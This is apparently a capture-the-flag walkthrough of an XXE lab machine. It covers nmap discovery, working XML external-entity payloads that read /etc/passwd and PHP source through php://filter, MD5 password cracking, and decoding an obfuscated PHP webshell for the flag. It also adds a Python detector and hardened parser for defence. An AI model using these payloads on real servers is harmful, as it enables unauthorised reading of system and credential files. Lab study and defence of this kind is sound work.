1. Host discovery

```bash
nmap -sS 192.168.74.1/24
```

- The target is 192.168.74.158, and it has port 80 open.
2. Initial reconnaissance

- Browsing to 192.168.74.158 shows only the Apache default page.
- robots.txt reveals an /xxe/ path and admin.php.
- admin.php lives under the /xxe/ directory; /xxe/admin.php is also a login page.
3. Testing the target

The login form under /xxe/ submits the credentials as an XML document to xxe.php. A normal login attempt and its response:

```http
POST /xxe/xxe.php HTTP/1.1
Host: 192.168.74.158
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.74.158/xxe/
Content-Type: text/plain;charset=UTF-8
Content-Length: 93
Connection: close

<?xml version="1.0" encoding="UTF-8"?><root><name>admin</name><password>123</password></root>
```

```http
HTTP/1.1 200 OK
Date: Mon, 27 May 2019 05:43:44 GMT
Server: Apache/2.4.27 (Ubuntu)
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

Sorry, this admin not available!
```
Because the server parses the submitted XML, the name field can be replaced with an external entity. First, reading /etc/passwd:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
```
Next, reading the source of admin.php through the php://filter wrapper, base64-encoded so that the PHP survives as entity content:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>1</password></root>
```
- Base64-decode the output and analyse the source: it contains a hard-coded password, and the login password is obtained by reversing the MD5 hash.
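As an added, defender-side example that is not part of the original walkthrough: the credential document the form posts, handled by a hardened parser that rejects any DTD before the XML reaches a parser, using the three request bodies above as constructed samples and written in Python rather than the target's PHP (the function and constant names are this example's own).

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies modelled on the three requests in this walkthrough.
LOGIN_OK = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<root><name>admin</name><password>123</password></root>')
LOGIN_FILE = ('<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n'
              '<!ENTITY admin SYSTEM "file:///etc/passwd">\n]>\n'
              '<root><name>&admin;</name><password>1</password></root>')
LOGIN_FILTER = ('<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n'
                '<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">\n]>\n'
                '<root><name>&admin;</name><password>1</password></root>')

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(r'<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\s+"([^"]*)"', re.IGNORECASE)
# Any entity reference other than the five predefined ones and numeric character refs.
ENTITY_REF_RE = re.compile(r"&(?!(?:lt|gt|amp|quot|apos|#\d+|#x[0-9a-fA-F]+);)[\w.-]+;")

def xxe_indicators(body: str) -> list:
    """Reasons a body looks like an XXE attempt (empty list = clean). A credential
    document never needs a DTD, so a DOCTYPE alone is grounds to reject; the entity
    URI and references are reported as well because that is what an alert needs."""
    reasons = []
    if DOCTYPE_RE.search(body):
        reasons.append("doctype")
    for uri in EXT_ENTITY_RE.findall(body):
        reasons.append("external-entity:" + uri)
    for ref in ENTITY_REF_RE.findall(body):
        reasons.append("entity-ref:" + ref)
    return reasons

def parse_login(body: str) -> tuple:
    """Hardened handler: refuse DTDs on the raw text, then parse and return (name, password).
    Rejecting before parsing means no entity declaration ever reaches a parser, whatever
    that parser's default entity-loading behaviour happens to be."""
    reasons = xxe_indicators(body)
    if reasons:
        raise ValueError("rejected: " + ", ".join(reasons))
    root = ET.fromstring(body)
    if root.tag != "root":
        raise ValueError("unexpected root element: " + root.tag)
    return root.findtext("name", ""), root.findtext("password", "")

def login_accepted(body: str) -> bool:
    """True only when the body is a plain credential document the handler will parse."""
    try:
        return parse_login(body) is not None
    except (ValueError, ET.ParseError):
        return False
```

The equivalent fix for the PHP endpoint is to parse without `LIBXML_NOENT` (so entity substitution stays off) and, on PHP versions before 8.0, to call `libxml_disable_entity_loader(true)` as well.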
- Clicking the link redirects to /xxe/flagmeout.php.
- It shows a blank page, so view the page source.
- Base32-decode it first, then base64-decode the result.
- That yields the path /etc/.flag.php.
Reading /etc/.flag.php the same way:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>1</password></root>
```
- After base64-decoding, it looks like a PHP webshell with no recognisable signatures (obfuscated PHP).
- Save it to a local environment as flag.php, adding `<?php` before and `?>` after the decoded content.
- Visiting flag.php then gives the flag.